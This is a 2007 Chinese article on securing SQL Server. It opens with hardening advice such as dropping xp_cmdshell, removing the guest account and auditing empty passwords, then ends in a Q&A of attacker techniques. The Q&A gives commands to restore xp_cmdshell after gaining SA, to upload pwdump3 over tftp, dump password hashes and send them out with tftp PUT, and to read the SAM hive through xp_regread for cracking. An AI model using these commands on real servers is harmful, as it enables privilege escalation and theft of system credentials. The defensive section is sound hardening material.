扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
作者:sebastian 来源:IT专家网 2007年9月15日
关键字: IIS 数据库 SQL Server SQL Server 各版本
SQL Server的安全配置 除跟着微软打满所有补丁外,还需要加强数据库的安全。 首先,你需要加强象sa这样的帐号的密码,跟系统帐号的使用配置相似,一般操作数据库不要使用象sa这样的最高权限的帐号,而使用能满足你的要求的一般帐号。 接着对扩展存储过程开始大屠杀,首先就是xp_cmdshell,还有就是上面那些一大堆存储过程,都drop吧,一般也用不着。 执行: use master sp_dropextendedproc ’xp_cmdshell’ 去掉guest帐号,阻止非授权用户访问。 去掉不必要的网络协议。 加强对数据库登陆的日志记录,最好记录所有登陆事件。可以用下面的简单DOS命令来查看日志: findstr /C:"登录" d:\Microsoft SQL Server\MSSQL\LOG\*.* 用管理员帐号定期检查所有帐号,是否密码为空或者过于简单,比如下面的语句: Use master Select name,Password from syslogins where password is null 用下面语句对所有帐号,检查对存储过程和扩展存储过程的执行权,提防不必要的执行权限扩散: Use master Select sysobjects.name From sysobjects, sysprotects Where sysprotects.uid = 0 AND xtype IN (’X’,’P’) AND sysobjects.id = sysprotects.id 加强数据库的安全是非常重要的,有的数据库服务器是和WEB服务器隔离开的,这就同MAIL服务器一样,数据库的日志可能就基本很少去查看,这将会成为管理员的一个疏忽点。类似DNS、MAIL等等,数据库服务器往往成为各种入侵的跳板。 下面是一些关于数据库的问答和技巧: 1、获得SA权限后,却不能执行xp_cmdshell存储过程怎么办? 答:可能是已经把xp_cmdshell等扩展存储过程删除了,可以用这个存储过程把xp_cmdshell恢复。 sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’ 2、通过数据库用pwdump获得系统管理员密码 先上传一个pwdump tftp -i GET pwdump3.exe pwdump3.exe tftp -i GET lsaext.dll lsaext.dll tftp -i GET pwservice.exe pwservice.exe pwdump3 127.0.0.1 outfile.txt tftp PUT outfile.txt outfile.txt 然后再用解密工具l0pht等等破解这些密码。 3、从数据库读取系统管理员密码。 能读出加密的密码是NT的"administrator"帐号也不能做的,SQL Server能读出来是使用的LocalSystem帐号,这个帐号比administrator更高一级。可以使用下面这个存储过程。不过读出来的密码是经过加密后的,然后再解密吧。 xp_regread ’HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account’,’F’ |
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者